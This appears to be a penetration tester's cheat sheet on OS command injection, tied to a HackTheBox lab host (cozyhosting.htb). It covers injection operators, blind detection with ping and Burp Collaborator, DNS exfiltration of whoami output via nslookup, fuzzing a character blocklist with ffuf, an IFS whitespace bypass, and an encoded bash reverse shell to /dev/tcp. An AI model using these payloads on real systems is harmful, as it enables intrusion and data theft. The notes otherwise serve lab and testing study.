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Cmd Injection

Where Would You Find Command Injection

  • In the following places:
  • Text boxes that take in input
  • Hidden URLs that take input
  • E.g. /execute/command-name
  • Or through queries e.g. /location?parameter=command
  • When using URLs, remember to URL encode the characters that aren’t accepted
  • Hidden ports:
  • Some frameworks open debug ports that take in arbitrary commands


  • Use command line symbols within the input to alter the executed command
  • Pay close attention to functions within an application that tend to be performed by an OS command
  • Two forms exist, blind command injection --> you do not see the returned output, and non-blind cmd injection --> the system command output gets returned back to you
  • Ensure you use the proper system commands per the OS
cat vs type 
ping -c vs ping -n #ping -n causes an infinte ping loop in linux
ls vs dir
  • Try to start with reading a world readable file

Non-Blind CMD Inj.

  • At the most basic level:
  • Use command line symbols within the input to alter the executed command
  • Once you have identified a potential injection point, use command line symbols within the input to alter the executed command
; | || & && > >>

  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection


  • ICMP and DNS are useful to determine blind cmd injection; ping -c11 #server will hang for roughly 10 seconds
  • Can also try to ping yourself, however many corporate environments have firewalls in place to stop this, so doesn't always mean blind cmd injection isn't taking place
  • Use tcpdump to capture the icmp echo requests.

  • This proves blind cmd injection, escalate to reverse shell

Burp Collaborator

  • Launch Burp, and choose:

Burp --> Burp Collaborator Client
Press --> "Copy to Clipboard" #to copy a randomly generated domain name
Execute your cmd injection
  • Press Poll Now to see if the request came through

  • If the above worked, move down to Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator Domain, try your command injection; a=$(whoami|base32|tr -d =); nslookup $
  • Press Poll now and you should have something returned like this:
  • Then type the following in your local terminal
echo -n O53XOLLEMF2GCCQ | wc -c
  • If this fails as Invalid Base32 add 1, or 2 equal signs at the end for padding
echo -n O53XOLLEMF2GCCQ= | base32 -d

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, create a burp request to the resource you want to test
  • It should be a post request
  • Identify the parameter that it is using to post the data to the server
  • Swap out the command injection attempt that is getting blocked in the burp request with:
  • Save the burp request to your local machine in a file
ffuf -request search.request --request-proto http -w /opt/Seclists/Fuzzing/special-chars.txt
  • You usually will have to ignore the & character as many webservers will think you are going to pass in another parameter
  • Now that you have your results back you must filter out the most common side that you see being returned
  • -fs 724
  • Can comma seperate filter size i.e. you see alot of 724 and 726 returned saying that character you posted is blocked
  • -fs 724,726
  • Ensure you also -mc all or match code to see all the different http status codes returned, look for 5XX errors
  • If you see errors on:
{ == SSTI
; | & == cmd injection
' " == SQLI

IFS Bypass No Spaces CmdInjection

  • whitespace bypass
POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin?error=Username%20can%27t%20contain%20whitespaces!
Upgrade-Insecure-Requests: 1

  • can see above that the username (our injection point) cannot contain spaces, we can use {IFS}to bypass this restriction and get cmd injection
  • Gaining a reverse shell, encode your payload and have it decode and execute to avoid special character issues
echo "bash -i >& /dev/tcp/ 0>&1" | base64 -w 0
// use this 